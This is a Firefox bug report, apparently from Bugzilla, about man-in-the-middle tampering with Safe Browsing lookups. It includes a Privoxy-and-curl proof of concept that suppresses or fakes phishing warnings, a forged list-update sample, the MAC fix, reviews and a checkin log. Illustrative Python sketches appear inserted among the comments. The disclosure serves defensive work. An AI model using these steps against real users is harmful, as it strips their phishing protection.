
Result of the anti-phishing check can be altered by man-in-the-middle

RESOLVED FIXED in Firefox 3 beta4

Status

RESOLVED FIXED
Component: Toolkit :: Safe Browsing
Priority: P2
Severity: critical
Reported: 11 years ago
Last modified: 3 years ago

People

(Reporter: Fabian Keil, Assigned: dcamp)

Tracking

Version: unspecified
Target Milestone: Firefox 3 beta4
Platform: x86 FreeBSD
Points: ---
Bug Flags: blocking-firefox3 +, wanted1.8.1.x -

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [sg:low spoof])

Attachments

(2 attachments)

v1: 98.31 KB, patch. Tony Chang (Google): review+
part 2: 26.54 KB, patch. Tony Chang (Google): review+
(Reporter)

Description

11 years ago
User-Agent:       Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8.1) Gecko/20061107 Firefox/2.0
Build Identifier: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.8.1) Gecko/20061107 Firefox/2.0

The per-site anti-phishing check is done unencrypted, so a
man-in-the-middle can intercept the request and mark sites
as phishing sites or, more importantly, prevent Firefox
from displaying the warning.

Another problem is that if Firefox can't reach the
anti-phishing server at all, it simply stops displaying
phishing warnings without informing the user about the
problem. A man-in-the-middle could use this to sabotage
the blacklist update (which is delivered encrypted and
thus can't be easily altered).

For a man-in-the-middle, this could actually make phishing
easier: a Firefox user who thinks she is protected will be
less careful about checking the URL before submitting
login information.

Instead of sending the phishing link through email,
a man-in-the-middle would intercept requests for valid
login pages and send redirects to his phishing site(s)
(provided the login page is accessed over HTTP).

After the first user has detected the redirect and
submitted the site to the anti-phishing server, the
attack would normally stop working for users of the
phishing protection. An attacker who sabotages
the result, however, can continue the attack much
longer.

Open WLANs and Tor exit nodes would be good positions
to run such attacks.

Reproducible: Always

Steps to Reproduce:
1.) Position yourself between the user and the login page. 
2.) Redirect requests for login pages to your phishing site,
    answer all requests for http://sb.google.com/safebrowsing/*
    with an empty document or just make sure that sb.google.com
    can't be reached.

Actual Results:  
Firefox no longer warns the user, even if the
phishing site is already known to the anti-phishing server.

Expected Results:  
Firefox should do all anti-phishing checks over
HTTPS and display a warning if the anti-phishing
server can't be reached or the server responds with
a redirect (which would be unlikely if HTTPS were used).
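As a model of the requested behavior, the failure-handling policy could look like the following sketch (`should_warn` and the response shapes are hypothetical illustrations, not Firefox code):

```python
def should_warn(lookup):
    """Decide whether to flag a page, per the reporter's suggestion.

    lookup is None when the anti-phishing server was unreachable,
    or a (status, body) tuple from an HTTPS lookup request.
    Any failure or redirect is treated as suspicious instead of
    silently disabling the check.
    """
    if lookup is None:                  # server unreachable
        return True                     # warn: protection unavailable
    status, body = lookup
    if 300 <= status < 400:             # unexpected redirect
        return True
    return body.startswith("phishy:")   # server flagged the site

# A blackholed or redirected lookup no longer silently disables the warning:
assert should_warn(None) is True
assert should_warn((302, "")) is True
assert should_warn((200, "")) is False
assert should_warn((200, "phishy:1:1")) is True
```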

To make the main problem visible without too much effort,
chaining Firefox with Privoxy (3.0.5 beta) is good enough;
afterwards:
 
#Create an empty file
fk@TP51 ~/test $touch keine-panik.txt

#Start local HTTP server
fk@TP51 ~/test $gatling -i 10.0.0.2 -p 80 -F > /dev/null &
[2] 35458

#Create redirect
fk@TP51 ~/test $echo -e "{+redirect{http://10.0.0.2/keine-panik.txt}}\nsb.google.com/safebrowsing" >> /usr/jails/privoxy-jail/usr/local/etc/privoxy/fk.action

#Test configuration
fk@TP51 ~/test $curl -v -L "http://sb.google.com/safebrowsing/lookup?blah"
* About to connect() to proxy 10.0.0.1 port 8118
*   Trying 10.0.0.1... connected
* Connected to 10.0.0.1 (10.0.0.1) port 8118
> GET http://sb.google.com/safebrowsing/lookup?blah HTTP/1.1
> User-Agent: curl/7.15.5 (i386-portbld-freebsd6.2) libcurl/7.15.5 OpenSSL/0.9.7e zlib/1.2.3
> Host: sb.google.com
> Pragma: no-cache
> Accept: */*
> Proxy-Connection: Keep-Alive
> 
< HTTP/1.0 302 Local Redirect from Privoxy
< Location: http://10.0.0.2/keine-panik.txt
< Content-Length: 0
< Date: Sat, 11 Nov 2006 16:30:01 GMT
< Connection: close
* Closing connection #0
* Issue another request to this URL: 'http://10.0.0.2/keine-panik.txt'
* About to connect() to proxy 10.0.0.1 port 8118
*   Trying 10.0.0.1... connected
* Connected to 10.0.0.1 (10.0.0.1) port 8118
> GET http://10.0.0.2/keine-panik.txt HTTP/1.1
> User-Agent: curl/7.15.5 (i386-portbld-freebsd6.2) libcurl/7.15.5 OpenSSL/0.9.7e zlib/1.2.3
> Host: 10.0.0.2
> Pragma: no-cache
> Accept: */*
> Proxy-Connection: Keep-Alive
> 
< HTTP/1.1 200 Coming Up
< Date: Sat, 11 Nov 2006 16:30:01 GMT
< Content-Type: text/plain
< Server: Gatling/0.8
< Content-Length: 0
< Last-Modified: Sat, 11 Nov 2006 16:29:36 GMT
< Connection: close
* Closing connection #0

A Privoxy-using Firefox version will now stop displaying warnings.
 
To have Firefox mark every site as a phishing site, one can reuse an
older response sent by the anti-phishing server:

#Save a real phishing warning
fk@TP51 ~/test $http_proxy= curl -s "http://sb.google.com/safebrowsing/lookup?sourceid=firefox-antiphish&features=TrustRank&client=Firefox2.0&mozver=1.8.1-0000000000&encver=1&nonce=-681723821&wrkey=MToWATEtBekso5qZrXIR-yHQ&encparams=QbcMZ9%2Bqt5VdpV5UsnZWBpdyArHbnu2h9jqNnnDJ8Q2j4Quvu6mRXSo%2FBhKVb7I11RtHI%2BD21QDy1QUaYpWYJrIQzFE6DaWR2nD6cA8%3D&" -o phishing-alarm.txt

#Change redirect:
fk@TP51 ~/test $sed -i "" -e "s@keine-panik@phishing-alarm@" /usr/jails/privoxy-jail/usr/local/etc/privoxy/fk.action

#Test new configuration
fk@TP51 ~/test $curl -v -L "http://sb.google.com/safebrowsing/lookup?blah"
* About to connect() to proxy 10.0.0.1 port 8118
*   Trying 10.0.0.1... connected
* Connected to 10.0.0.1 (10.0.0.1) port 8118
> GET http://sb.google.com/safebrowsing/lookup?blah HTTP/1.1
> User-Agent: curl/7.15.5 (i386-portbld-freebsd6.2) libcurl/7.15.5 OpenSSL/0.9.7e zlib/1.2.3
> Host: sb.google.com
> Pragma: no-cache
> Accept: */*
> Proxy-Connection: Keep-Alive
> 
< HTTP/1.0 302 Local Redirect from Privoxy
< Location: http://10.0.0.2/phishing-alarm.txt
< Content-Length: 0
< Date: Sat, 11 Nov 2006 16:11:58 GMT
< Connection: close
* Closing connection #0
* Issue another request to this URL: 'http://10.0.0.2/phishing-alarm.txt'
* About to connect() to proxy 10.0.0.1 port 8118
*   Trying 10.0.0.1... connected
* Connected to 10.0.0.1 (10.0.0.1) port 8118
> GET http://10.0.0.2/phishing-alarm.txt HTTP/1.1
> User-Agent: curl/7.15.5 (i386-portbld-freebsd6.2) libcurl/7.15.5 OpenSSL/0.9.7e zlib/1.2.3
> Host: 10.0.0.2
> Pragma: no-cache
> Accept: */*
> Proxy-Connection: Keep-Alive
> 
< HTTP/1.1 200 Coming Up
< Date: Sat, 11 Nov 2006 16:11:58 GMT
< Content-Type: text/plain
< Server: Gatling/0.8
< Content-Length: 11
< Last-Modified: Sat, 11 Nov 2006 15:50:35 GMT
< Connection: close
phishy:1:1
* Closing connection #0

(The excerpts were copied and pasted in a different order,
in case you wondered about the times in the HTTP headers.)

Comment 1

11 years ago
If an attacker is MITM'ing you, why would he bother using a hostname on the anti-phishing server's blacklist?  He can choose any hostname that suits his needs and make the site appear there.

Comment 2

11 years ago
Confirmed. Regardless of how unlikely (there are probably more useful malicious attacks if you're in a position to do this), it is possible.

DOS'ing the service would reduce its effectiveness over time. No big deal in the short run (updates blocked while at the local coffee house?), but we may want some warning UI if we haven't been able to contact the service for some period of time.

Part of the list comes back encrypted (with a key retrieved over a secure SSL connection), but part does not and each part is optional (if the server decides you're up to date that section isn't sent). Besides blocking the service, the MITM could respond with

[goog-black-url 1.9322 update]
+http://www.google.com	c
+http://www.google.com/firefox?client=firefox-a&rls=org.mozilla:en-US:official	c
+https://login.yahoo.com/config/login_verify2?&.src=ym	c
+http://www.paypal.com/	c
+https://sitekey.bankofamerica.com/sas/signonScreen.do?state=CA	c

[goog-white-domain 1.66 update]
+phishydomain.com	1

As Jesse points out, whitelisting the phishing domain is pretty pointless if you can spoof someone's DNS already. Adding tons of legit sites to the blacklist might be "fun" for some pranksters.

Instead of an "update" you could also send a completely new list that would wipe out whatever was there by default, effectively disabling the service until the user could reconnect to the legit service. If the fake server gave version numbers that were slightly behind the user's announced version (it's a parameter of the update URL) then when they did connect they'd get served updates from that point and the service would assume their previous data matched the announced version. If the fake server picked values that were too high the real server will next time simply resend the whole list, undoing the prankster's hard work.
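The wire format quoted above is simple enough to model; here is a simplified, hypothetical parser for the `[table version update]` header and `+url<TAB>value` / `-url` data lines (real clients handle more record types and escaping):

```python
def parse_update(text):
    """Parse a simplified safebrowsing v1-style list update.

    Section headers look like "[tablename major.minor update]";
    data lines are "+url<TAB>value" (add) or "-url" (remove).
    Returns {tablename: {url: value}}.
    """
    tables, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("["):
            name = line[1:-1].split()[0]
            current = tables.setdefault(name, {})
        elif line.startswith("+") and current is not None:
            url, _, value = line[1:].partition("\t")
            current[url] = value
        elif line.startswith("-") and current is not None:
            current.pop(line[1:], None)
    return tables

# A MITM-supplied "update" like the one above lands directly in the tables:
fake = ("[goog-black-url 1.9322 update]\n"
        "+http://www.paypal.com/\tc\n"
        "[goog-white-domain 1.66 update]\n"
        "+phishydomain.com\t1\n")
t = parse_update(fake)
assert t["goog-black-url"]["http://www.paypal.com/"] == "c"
assert t["goog-white-domain"]["phishydomain.com"] == "1"
```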
Assignee: nobody → tony
Status: UNCONFIRMED → NEW
Ever confirmed: true
Whiteboard: [sg:low spoof]

Comment 3

11 years ago
On a side note, the servers do support returning signed table updates:
http://sb.google.com/safebrowsing/update?version=goog-sandbox-text:1:-1&wrkey=MTrycXweOeQxyRHZztTRApds

But we disabled support for the regular table updates because it seemed that if someone can intercept traffic, you're in bigger trouble than just getting bad phishing table updates.

I don't think the MAC checking code is in mozilla CVS, but we could port it from Google Toolbar pretty easily.

Also, since we download the lists even in remote lookup mode, if the server doesn't respond in something like 5-10 seconds, we should just fall back on the local list.  I've been meaning to file a bug about this.  This seems like a pretty low priority since we're seeing a very small number of users opting for remote lookups.

Jesse asked a while back if there should be some UI to notify the user if remote lookups are failing.  That sounds reasonable to me, but I'm not exactly sure what it would look like or what the user would do in such a situation (my guess is the user would just ignore it and keep on browsing the web).
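The timeout-and-fallback behavior described above could be sketched like this (illustrative only; `remote_lookup` and `local_lookup` are hypothetical stand-ins for the real lookup paths):

```python
import concurrent.futures, time

def check_url(url, remote_lookup, local_lookup, timeout=5.0):
    """Try the remote lookup first; on timeout or error, fall back to
    the local list instead of silently reporting the URL as safe."""
    with concurrent.futures.ThreadPoolExecutor(max_workers=1) as pool:
        future = pool.submit(remote_lookup, url)
        try:
            return future.result(timeout=timeout)
        except Exception:               # timeout, network error, bad reply
            return local_lookup(url)

# A hung remote lookup falls back to the local list:
slow = lambda url: (time.sleep(0.5), False)[1]      # simulates a blackholed server
local = lambda url: url == "http://phish.example/"  # local blacklist stand-in
assert check_url("http://phish.example/", slow, local, timeout=0.1) is True
```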
(Assignee)

Comment 4

10 years ago
In FFX3 the protocol is changed so that a poisoning during a man-in-the-middle attack will last longer.  This bug should be reevaluated with that in mind...
Flags: blocking-firefox3?

Comment 5

10 years ago
Not only will it last longer, but a MITM attack could easily turn off the SB service now by redirecting SB requests to the trash; as soon as that happens, we silently turn off SB protection. :(

Moving up the priority chain for now.
Flags: blocking-firefox3? → blocking-firefox3+
Priority: -- → P2
Target Milestone: --- → Firefox 3 beta4
(Assignee)

Updated

10 years ago
Assignee: tony → dcamp
(Assignee)

Comment 6

10 years ago
I'm working on a patch to support the signed table updates.  A few things to keep in mind:

a) This requires us to fetch a persistent key from google and present it for each update and gethash request.  The current key-fetching code (a holdover from the firefox2 safebrowsing code) fetches a new key once per session, with a max of one fetch per day.

b) Supporting this will create a new failure condition.  If we can't fetch a key, there's not much we can do but start failing gethash requests (which would currently cause a silent failure to block a site). 

Additionally, the server can tell us that our key is invalid, in which case we're required to drop our key and fetch a new one before requesting again. A MITM can force this rekeying, because the rekey request can't be protected by the signed update.  I'm not sure this is any added problem, because the MITM could just cause gethash results to fail anyway.
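The signed-update scheme described in this comment amounts to a MAC over the update body, keyed with the per-client key; a rough sketch follows (the digest and encoding here are assumptions for illustration, not the actual wire format):

```python
import hmac, hashlib, base64

def verify_update(client_key: bytes, body: bytes, mac_b64: str) -> bool:
    """Check an update body against the MAC the server sent.
    On failure the client must discard the update (and, if the server
    says the key is invalid, fetch a new key before requesting again)."""
    expected = base64.b64encode(
        hmac.new(client_key, body, hashlib.sha1).digest()).decode()
    return hmac.compare_digest(expected, mac_b64)

key = b"per-client-secret"
body = b"[goog-black-url 1.9322 update]\n+http://evil.example/\tc\n"
good_mac = base64.b64encode(
    hmac.new(key, body, hashlib.sha1).digest()).decode()
assert verify_update(key, body, good_mac)
# A MITM who alters the body cannot forge a matching MAC without the key:
assert not verify_update(key, body + b"+http://paypal.com/\tc\n", good_mac)
```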
(Assignee)

Comment 7

10 years ago
Created attachment 303177 [details] [diff] [review]
v1

Here's a first stab at implementing the MAC for updates and gethash requests.

Rather than failing gethash requests outright if the key server is unavailable, this patch will allow gethash requests to succeed, BUT it will not cache the results.  So a MITM could potentially alter a gethash request, but it would be difficult and he could presumably do worse things directly.

This patch also drops the lookup key when cookies are cleared.

While I was here I got rid of url-crypto.js, which is no longer needed.

There still might be some rough edges and I haven't written unit tests yet, but I wanted to get this up for review ASAP.
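The policy this patch describes can be modeled in a few lines: complete the hash either way, but only cache when the response could be verified (a toy model, not the actual nsUrlClassifierHashCompleter logic):

```python
class HashCompleter:
    """Toy model of the patch's gethash policy: results are only
    cached when the response MAC could be verified, i.e. when we
    managed to fetch a key from the server."""
    def __init__(self, have_key):
        self.have_key = have_key
        self.cache = {}

    def complete(self, prefix, fetch):
        if prefix in self.cache:
            return self.cache[prefix]
        result = fetch(prefix)          # network gethash request
        if self.have_key:               # MAC verified: safe to cache
            self.cache[prefix] = result
        return result

calls = []
fetch = lambda p: calls.append(p) or "fullhash-" + p

keyed = HashCompleter(have_key=True)
keyed.complete("ab", fetch); keyed.complete("ab", fetch)
unkeyed = HashCompleter(have_key=False)
unkeyed.complete("cd", fetch); unkeyed.complete("cd", fetch)
assert calls == ["ab", "cd", "cd"]      # the unverified path refetches
```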
Attachment #303177 - Flags: review?
(Assignee)

Comment 8

10 years ago
This patch depends on the nsICryptoHMAC implementation in bug 415799.
Depends on: 415799
(Assignee)

Updated

10 years ago
Attachment #303177 - Flags: review? → review?(tony)

Comment 9

10 years ago
Comment on attachment 303177 [details] [diff] [review]
v1

>   var initialUpdateDelay = 3000;
>   if (tableData != "") {
>     // Add a fuzz of 0-5 minutes.
>-    initialUpdateDelay += Math.floor(Math.random() * (5 * 60 * 1000));
>+    //initialUpdateDelay += Math.floor(Math.random() * (5 * 60 * 1000));
>   }
> 
>   this.currentUpdateChecker_ =

Commented out for testing?


>+  this.updateWaitingForKey = false;

Could this be moved into PROT_ListManager.prototype.newKey_?  It seems to make more sense there.


>+nsresult
>+nsUrlClassifierHashCompleterRequest::HandleMAC(nsACString::const_iterator& begin,
>+                                               const nsACString::const_iterator& end)
>+{

Should we set mVerified to PR_FALSE here so a previously verified mac doesn't cascade through to future updates?


>+  if (!PL_Base64Decode(key.BeginReading(), key.Length(),
>+                       _retval.BeginWriting())) {

Shouldn't this be base64 instead of key?
Attachment #303177 - Flags: review?(tony) → review+
(Assignee)

Comment 10

10 years ago
Created attachment 304859 [details] [diff] [review]
part 2

Second patch (to be applied on top of the first):
* Fixes for review comments
* Bugfix for forwarded update URLs with commas in them.
* Updates and adds unit tests.
Attachment #304859 - Flags: review?(tony)

Comment 11

10 years ago
Comment on attachment 304859 [details] [diff] [review]
part 2

-  this.updateWaitingForKey = false;

I don't see where this was re-added.  Other than that, this patch looks good.
Attachment #304859 - Flags: review?(tony) → review+
(Assignee)

Comment 12

10 years ago
(In reply to comment #11)
> (From update of attachment 304859 [details] [diff] [review])
> -  this.updateWaitingForKey = false;
> 
> I don't see where this was re-added.  Other than that, this patch looks good.
> 

newKey_() already sets it to false; this was just redundant.

Comment 13

10 years ago
Ah, I see it.  Looks good.
Keywords: checkin-needed
(Assignee)

Comment 14

10 years ago
We can set checkin-needed once 415799 lands :)
Keywords: checkin-needed
Priority: P2 → P1
(Assignee)

Comment 15

10 years ago
Checking in browser/app/profile/firefox.js;
/cvsroot/mozilla/browser/app/profile/firefox.js,v  <--  firefox.js
new revision: 1.289; previous revision: 1.288
done
Checking in browser/components/safebrowsing/content/globalstore.js;
/cvsroot/mozilla/browser/components/safebrowsing/content/globalstore.js,v  <--  globalstore.js
new revision: 1.21; previous revision: 1.20
done
Checking in browser/components/safebrowsing/content/malware-warden.js;
/cvsroot/mozilla/browser/components/safebrowsing/content/malware-warden.js,v  <--  malware-warden.js
new revision: 1.9; previous revision: 1.8
done
Checking in toolkit/components/url-classifier/content/listmanager.js;
/cvsroot/mozilla/toolkit/components/url-classifier/content/listmanager.js,v  <--  listmanager.js
new revision: 1.26; previous revision: 1.25
done
Checking in toolkit/components/url-classifier/content/url-crypto-key-manager.js;
/cvsroot/mozilla/toolkit/components/url-classifier/content/url-crypto-key-manager.js,v  <--  url-crypto-key-manager.js
new revision: 1.13; previous revision: 1.12
done
Removing toolkit/components/url-classifier/content/url-crypto.js;
/cvsroot/mozilla/toolkit/components/url-classifier/content/url-crypto.js,v  <--  url-crypto.js
new revision: delete; previous revision: 1.7
done
Checking in toolkit/components/url-classifier/public/nsIUrlClassifierDBService.idl;
/cvsroot/mozilla/toolkit/components/url-classifier/public/nsIUrlClassifierDBService.idl,v  <--  nsIUrlClassifierDBService.idl
new revision: 1.21; previous revision: 1.20
done
Checking in toolkit/components/url-classifier/public/nsIUrlClassifierHashCompleter.idl;
/cvsroot/mozilla/toolkit/components/url-classifier/public/nsIUrlClassifierHashCompleter.idl,v  <--  nsIUrlClassifierHashCompleter.idl
new revision: 1.4; previous revision: 1.3
done
Checking in toolkit/components/url-classifier/public/nsIUrlClassifierStreamUpdater.idl;
/cvsroot/mozilla/toolkit/components/url-classifier/public/nsIUrlClassifierStreamUpdater.idl,v  <--  nsIUrlClassifierStreamUpdater.idl
new revision: 1.8; previous revision: 1.7
done
Checking in toolkit/components/url-classifier/src/nsUrlClassifierDBService.cpp;
/cvsroot/mozilla/toolkit/components/url-classifier/src/nsUrlClassifierDBService.cpp,v  <--  nsUrlClassifierDBService.cpp
new revision: 1.65; previous revision: 1.64
done
Checking in toolkit/components/url-classifier/src/nsUrlClassifierHashCompleter.cpp;
/cvsroot/mozilla/toolkit/components/url-classifier/src/nsUrlClassifierHashCompleter.cpp,v  <--  nsUrlClassifierHashCompleter.cpp
new revision: 1.4; previous revision: 1.3
done
Checking in toolkit/components/url-classifier/src/nsUrlClassifierHashCompleter.h;
/cvsroot/mozilla/toolkit/components/url-classifier/src/nsUrlClassifierHashCompleter.h,v  <--  nsUrlClassifierHashCompleter.h
new revision: 1.5; previous revision: 1.4
done
Checking in toolkit/components/url-classifier/src/nsUrlClassifierLib.js;
/cvsroot/mozilla/toolkit/components/url-classifier/src/nsUrlClassifierLib.js,v  <--  nsUrlClassifierLib.js
new revision: 1.10; previous revision: 1.9
done
Checking in toolkit/components/url-classifier/src/nsUrlClassifierListManager.js;
/cvsroot/mozilla/toolkit/components/url-classifier/src/nsUrlClassifierListManager.js,v  <--  nsUrlClassifierListManager.js
new revision: 1.11; previous revision: 1.10
done
Checking in toolkit/components/url-classifier/src/nsUrlClassifierStreamUpdater.cpp;
/cvsroot/mozilla/toolkit/components/url-classifier/src/nsUrlClassifierStreamUpdater.cpp,v  <--  nsUrlClassifierStreamUpdater.cpp
new revision: 1.20; previous revision: 1.19
done
Checking in toolkit/components/url-classifier/src/nsUrlClassifierStreamUpdater.h;
/cvsroot/mozilla/toolkit/components/url-classifier/src/nsUrlClassifierStreamUpdater.h,v  <--  nsUrlClassifierStreamUpdater.h
new revision: 1.14; previous revision: 1.13
done
Checking in toolkit/components/url-classifier/src/nsUrlClassifierUtils.cpp;
/cvsroot/mozilla/toolkit/components/url-classifier/src/nsUrlClassifierUtils.cpp,v  <--  nsUrlClassifierUtils.cpp
new revision: 1.10; previous revision: 1.9
done
Checking in toolkit/components/url-classifier/src/nsUrlClassifierUtils.h;
/cvsroot/mozilla/toolkit/components/url-classifier/src/nsUrlClassifierUtils.h,v  <--  nsUrlClassifierUtils.h
new revision: 1.6; previous revision: 1.5
done
Checking in toolkit/components/url-classifier/tests/unit/head_urlclassifier.js;
/cvsroot/mozilla/toolkit/components/url-classifier/tests/unit/head_urlclassifier.js,v  <--  head_urlclassifier.js
new revision: 1.10; previous revision: 1.9
done
Checking in toolkit/components/url-classifier/tests/unit/test_partial.js;
/cvsroot/mozilla/toolkit/components/url-classifier/tests/unit/test_partial.js,v  <--  test_partial.js
new revision: 1.5; previous revision: 1.4
done
Checking in toolkit/components/url-classifier/tests/unit/test_streamupdater.js;
/cvsroot/mozilla/toolkit/components/url-classifier/tests/unit/test_streamupdater.js,v  <--  test_streamupdater.js
new revision: 1.5; previous revision: 1.4
done
Status: NEW → RESOLVED
Last Resolved: 10 years ago
Priority: P1 → P2
Resolution: --- → FIXED

Comment 16
Are we going to back-port this to Firefox 2? If not--and I suspect not unless we see evidence there is an active threat--then we should unhide this fixed bug.
Flags: wanted1.8.1.x?
Group: security
Flags: wanted1.8.1.x? → wanted1.8.1.x-

Comment 17
(In reply to comment #7)
> (...)
> 
> This patch also drops the lookup key when cookies are cleared.
> 
> (...)

Why is this? What do cookies have to do with this bug at all?
(Note that I wasn't able to comment earlier, because this bug was hidden.)

Comment 18
(In reply to comment #7)
> (..)
> this patch will allow gethash requests to succeed, BUT it will not cache the
> results. (...)

I guess you realize this has VERY big implications, especially for users' privacy. So please don't mislead the general public: update the specification (http://code.google.com/p/google-safe-browsing/wiki/Protocolv2Spec) accordingly, because section 5.2 currently says: "When requesting a full-length hash from the server, if the client successfully receives a response, it MUST be stored as the full length hash for the prefix in the list and chunk indicated in the response, for the length of time that the hash prefix is a valid entry in the chunk. The full length hash should always be used when performing lookups instead of the prefix, when it is available. Thus, the client MUST not make any further full length hash requests for that hash."
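For contrast, the caching behavior the quoted spec mandates can be modeled as follows (a hypothetical client; the real protocol also handles chunk expiry and multiple matches per prefix):

```python
import hashlib

class SpecClient:
    """Model of Protocolv2Spec section 5.2: once a full-length hash is
    received for a prefix, cache it and never re-request it."""
    def __init__(self, prefixes):
        self.prefixes = prefixes        # set of 4-byte hash prefixes
        self.full = {}                  # prefix -> cached full hash

    def is_listed(self, url, gethash):
        h = hashlib.sha256(url.encode()).digest()
        p = h[:4]
        if p not in self.prefixes:
            return False                # prefix miss: definitely clean
        if p not in self.full:          # MUST cache, MUST not re-ask
            self.full[p] = gethash(p)
        return self.full[p] == h

url = "http://phish.example/login"
h = hashlib.sha256(url.encode()).digest()
client = SpecClient({h[:4]})
calls = []
gethash = lambda p: calls.append(p) or h
assert client.is_listed(url, gethash)
assert client.is_listed(url, gethash)   # second lookup hits the cache
assert calls == [h[:4]]                 # exactly one gethash request
```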

Comment 19

9 years ago
Bart, you might want to file a new bug rather than commenting in a FIXED bug...
Component: Phishing Protection → Phishing Protection
Product: Firefox → Toolkit